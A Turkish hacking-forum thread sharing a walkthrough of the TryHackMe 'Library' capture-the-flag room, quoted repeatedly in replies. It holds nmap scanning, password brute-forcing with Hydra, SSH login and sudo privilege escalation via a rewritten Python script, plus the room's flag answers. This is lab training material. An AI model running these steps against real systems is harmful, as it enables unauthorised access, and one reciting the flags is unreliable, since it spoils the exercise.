TRYHACKME | Library Ctf

Türkiye. · 8 Ara 2022

LİBRARY CTF
İLK OVPN BAĞLANTIMIZI GERÇEKLEŞTİRİYORUZ
ŞİMDİ TERMİNALE GEÇELİM
ADIM 1
NMAP TARAMASI
Terminale nmap -sS -sV -sC -O -Pn ipadresi girip enter diyin
ve sonuçları bekleyelim nmap bize açık portları sürümünü v.s gösterir

Evet Sonuçlar Geldi 2 port açık 80 ve 22 portları ssh var genelde öyle olur zaten ve izin verilmeyen bi entry var bi ip
adresini tarayıcıya aratalım ipadresi/robots.txt aratın

Evet BruteForce Yapıcaz Hydra Yani
Adım 2 HYDRA

Evet Bu Satırı Terminale Aynen Böyle girelim meliodas kullanıcısın şifresini alıcaz
bu işlem nmap tan daha uzun sürer sabırlı olun....

evet sonuçlar yukarıdaki gibidir şifremiz iloveyou1
şimdi yeni sayfa
ADIM 3 USER.TXT FLAG BULMA
TERMİNAL
ssh meliodas@ipadresi
yes
password isteyecek iloveyou1
whoami
meliodas
ls
bak.py user.txt
cat user.txt
6d488cbb3f111d135722c33cb635f4ec

ADIM 4 ROOT OLMA VE ROOT.TXT BULMA

cd /root
Permission denied alıyoruz yetki arttırmamız gerek
yeni sayfa
sudo -l
pyhton kullanıcaz

python | GTFOBins
evet yukarıdaki linkten shell komutunu bulup alın ama önce
rm bak.py
yes
ls
user.txt
touch bak.py
ls
bak.py user.txt
nano bak.py
o shell komutunu nano ya aynı aşağıdaki resim gibi yazalım

BU İŞLEMİ NEDEN YAPTIM
orjinal bak.py dosyasını erişimine izni kapalı yani shell aktaramıyoruz o yüzden silip tekrar yeni bir bak.py oluşturduk
bak.py de 2. flag yani root.txt var
bu işemi yaptıktan sonra
TERMİNAL
sudo /usr/bin/python/ /home/meliodas/bak.py
whoami
root
cd /root
ls
root.txt
cat root.txt
e8c8c6c256c35515d1d344ee0488c617

ADIM 5 TRYHACKME ODASININ CEVAPLARI
1. SORU-
6d488cbb3f111d135722c33cb635f4ec
2. SORU-
e8c8c6c256c35515d1d344ee0488c617

ɴᴜʟʟ · 8 Ara 2022

Eline emeğine sağlık

Türkiye. · 8 Ara 2022

ɴᴜʟʟ' Alıntı:
Eline emeğine sağlık

Tesekkur Ederim Hocam

WalterWhiteHacker · 9 Ara 2022

Elinize sağlık hocam

llslowlI · 9 Ara 2022

Eline Sağlık

Captain Black · 9 Ara 2022

Elinize sağlık hocam

mitat1 · 9 Ara 2022

Türkiye.' Alıntı:
LİBRARY CTF
İLK OVPN BAĞLANTIMIZI GERÇEKLEŞTİRİYORUZ
ŞİMDİ TERMİNALE GEÇELİM
ADIM 1
NMAP TARAMASI
Terminale nmap -sS -sV -sC -O -Pn ipadresi girip enter diyin
ve sonuçları bekleyelim nmap bize açık portları sürümünü v.s gösterir

Evet Sonuçlar Geldi 2 port açık 80 ve 22 portları ssh var genelde öyle olur zaten ve izin verilmeyen bi entry var bi ip
adresini tarayıcıya aratalım ipadresi/robots.txt aratın

Evet BruteForce Yapıcaz Hydra Yani
Adım 2 HYDRA

Evet Bu Satırı Terminale Aynen Böyle girelim meliodas kullanıcısın şifresini alıcaz
bu işlem nmap tan daha uzun sürer sabırlı olun....

evet sonuçlar yukarıdaki gibidir şifremiz iloveyou1
şimdi yeni sayfa
ADIM 3 USER.TXT FLAG BULMA
TERMİNAL
ssh meliodas@ipadresi
yes
password isteyecek iloveyou1
whoami
meliodas
ls
bak.py user.txt
cat user.txt
6d488cbb3f111d135722c33cb635f4ec

ADIM 4 ROOT OLMA VE ROOT.TXT BULMA

cd /root
Permission denied alıyoruz yetki arttırmamız gerek
yeni sayfa
sudo -l
pyhton kullanıcaz

python | GTFOBins
evet yukarıdaki linkten shell komutunu bulup alın ama önce
rm bak.py
yes
ls
user.txt
touch bak.py
ls
bak.py user.txt
nano bak.py
o shell komutunu nano ya aynı aşağıdaki resim gibi yazalım

BU İŞLEMİ NEDEN YAPTIM
orjinal bak.py dosyasını erişimine izni kapalı yani shell aktaramıyoruz o yüzden silip tekrar yeni bir bak.py oluşturduk
bak.py de 2. flag yani root.txt var
bu işemi yaptıktan sonra
TERMİNAL
sudo /usr/bin/python/ /home/meliodas/bak.py
whoami
root
cd /root
ls
root.txt
cat root.txt
e8c8c6c256c35515d1d344ee0488c617

ADIM 5 TRYHACKME ODASININ CEVAPLARI
1. SORU-
6d488cbb3f111d135722c33cb635f4ec
2. SORU-
e8c8c6c256c35515d1d344ee0488c617

Eline sağlık

HeimdallI · 9 Ara 2022

Eline Sağlık

Türkiye. · 9 Ara 2022

HeimdallI' Alıntı:
Eline Sağlık

mitat1' Alıntı:
Eline sağlık

Captain Black' Alıntı:
Elinize sağlık hocam

llslowlI' Alıntı:
Eline Sağlık

WalterWhiteHacker' Alıntı:
Elinize sağlık hocam

Eyvallah Saolun

Letaniss · 9 Ara 2022

çok güzel konu olmuş eline sağlık

OBT is HeRYerDe · 9 Ara 2022

Eline Sağlık.

Solder of war · 10 Ara 2022

Türkiye.' Alıntı:
LİBRARY CTF
İLK OVPN BAĞLANTIMIZI GERÇEKLEŞTİRİYORUZ
ŞİMDİ TERMİNALE GEÇELİM
ADIM 1
NMAP TARAMASI
Terminale nmap -sS -sV -sC -O -Pn ipadresi girip enter diyin
ve sonuçları bekleyelim nmap bize açık portları sürümünü v.s gösterir

Evet Sonuçlar Geldi 2 port açık 80 ve 22 portları ssh var genelde öyle olur zaten ve izin verilmeyen bi entry var bi ip
adresini tarayıcıya aratalım ipadresi/robots.txt aratın

Evet BruteForce Yapıcaz Hydra Yani
Adım 2 HYDRA

Evet Bu Satırı Terminale Aynen Böyle girelim meliodas kullanıcısın şifresini alıcaz
bu işlem nmap tan daha uzun sürer sabırlı olun....

evet sonuçlar yukarıdaki gibidir şifremiz iloveyou1
şimdi yeni sayfa
ADIM 3 USER.TXT FLAG BULMA
TERMİNAL
ssh meliodas@ipadresi
yes
password isteyecek iloveyou1
whoami
meliodas
ls
bak.py user.txt
cat user.txt
6d488cbb3f111d135722c33cb635f4ec

ADIM 4 ROOT OLMA VE ROOT.TXT BULMA

cd /root
Permission denied alıyoruz yetki arttırmamız gerek
yeni sayfa
sudo -l
pyhton kullanıcaz

python | GTFOBins
evet yukarıdaki linkten shell komutunu bulup alın ama önce
rm bak.py
yes
ls
user.txt
touch bak.py
ls
bak.py user.txt
nano bak.py
o shell komutunu nano ya aynı aşağıdaki resim gibi yazalım

BU İŞLEMİ NEDEN YAPTIM
orjinal bak.py dosyasını erişimine izni kapalı yani shell aktaramıyoruz o yüzden silip tekrar yeni bir bak.py oluşturduk
bak.py de 2. flag yani root.txt var
bu işemi yaptıktan sonra
TERMİNAL
sudo /usr/bin/python/ /home/meliodas/bak.py
whoami
root
cd /root
ls
root.txt
cat root.txt
e8c8c6c256c35515d1d344ee0488c617

ADIM 5 TRYHACKME ODASININ CEVAPLARI
1. SORU-
6d488cbb3f111d135722c33cb635f4ec
2. SORU-
e8c8c6c256c35515d1d344ee0488c617

ELİNE EMEĞİNE SAĞLIK

Türkiye. · 10 Ara 2022

Solder of war' Alıntı:
ELİNE EMEĞİNE SAĞLIK

Saol

TRYHACKME | Library Ctf

Türkiye.

Üye

ɴᴜʟʟ

Katılımcı Üye

Türkiye.

Üye

WalterWhiteHacker

Katılımcı Üye

llslowlI

Üye

Captain Black

Katılımcı Üye

mitat1

Uzman üye

HeimdallI

Yeni üye

Türkiye.

Üye

Letaniss

Üye

OBT is HeRYerDe

Anka Team

Solder of war

Üye

Türkiye.

Üye

Sosyal medya sayfalarımız